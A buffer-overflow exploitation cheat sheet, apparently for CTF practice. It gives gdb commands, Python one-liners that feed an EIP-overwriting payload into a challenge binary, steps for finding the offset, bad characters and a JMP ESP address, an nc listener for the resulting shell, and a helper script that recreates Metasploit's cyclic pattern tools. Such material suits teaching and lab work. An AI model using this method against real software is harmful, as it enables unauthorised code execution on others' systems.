Buffer Overflow
Reminders
readelf -l <program>
(gdb) disas main
(gdb) break *0x08048550
(gdb) x/xw $esp
(gdb) x/4i 0xb7e04e81
(gdb) continue
(gdb-peda) dumpargs
run <<< $(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 40 + b"\xef\xbe\xad\xde")')
(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 40 + b"\xef\xbe\xad\xde" + b"\n")'; /bin/cat) | ./ch13

Methodology
Generate a long cyclic pattern to overflow the input:
msf-pattern_create -l 5000
Then read the EIP value at the crash, for example 31704330:
msf-pattern_offset -l 5000 -q 31704330
Now we know the offset of EIP, for example an exact match at offset 2012.
A simple Python script should now overwrite EIP with 4 * "B" = 42 42 42 42.
Next, add the badchars to our script:
Inspect memory at the ESP address, compare the characters and note any bad characters; often the only one is \x00.
Then check the memory protections with readelf -l <program>.
Find an address containing \xff\xe4 (= JMP ESP) in the target. Check the addresses and try them.
Remove the bad chars from our script, add the address to the payload and modify the message.
Put a breakpoint at this address and generate a shellcode that avoids the bad characters (here only \x00), for example:
Watch the size: the payload can't be too big.
Add the payload to the script, don't forget to prefix it with b (bytes literal), and send it in the message.
Also add some padding characters between the address and the payload.
Set up the listener: nc -lvp 1234
Cross your fingers, it should work.
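Added example, not part of the original cheat sheet: a small Python reimplementation of the cyclic pattern that msf-pattern_create emits and of the offset lookup msf-pattern_offset performs, so the numbers in the offset step above (EIP 31704330 at offset 2012) can be checked during crash triage without the Metasploit tools. It assumes the classic three-character pattern (upper, lower, digit) and a 32-bit little-endian EIP.

```python
import string
from itertools import product

# Added example (not the page's own code): the Aa0Aa1... cyclic pattern and
# the little-endian offset lookup, used to verify a crash's EIP offset.

MAX_PATTERN = 26 * 26 * 10 * 3  # the pattern repeats after 20280 bytes


def pattern_create(length: int) -> bytes:
    """Return `length` bytes of the pattern Aa0Aa1Aa2...Az9Ba0... (max 20280)."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat, offsets would be ambiguous")
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int = 5000):
    """Offset in the pattern of the 4 bytes that ended up in EIP.

    `eip_hex` is the register value as the debugger prints it (e.g. "31704330");
    on x86 the bytes sit in memory little-endian, so the value is reversed
    before searching. Returns None if the value did not come from the pattern.
    """
    needle = int(eip_hex, 16).to_bytes(4, "little")
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    print(pattern_create(5000)[:12])   # b'Aa0Aa1Aa2Aa3'
    print(pattern_offset("31704330"))  # 2012, matching the step above
    print(pattern_offset("41414141"))  # None: "AAAA" never occurs in the pattern
```

A None result means EIP was not overwritten with pattern bytes at all (the crash came from somewhere else), which is worth knowing before chasing an offset.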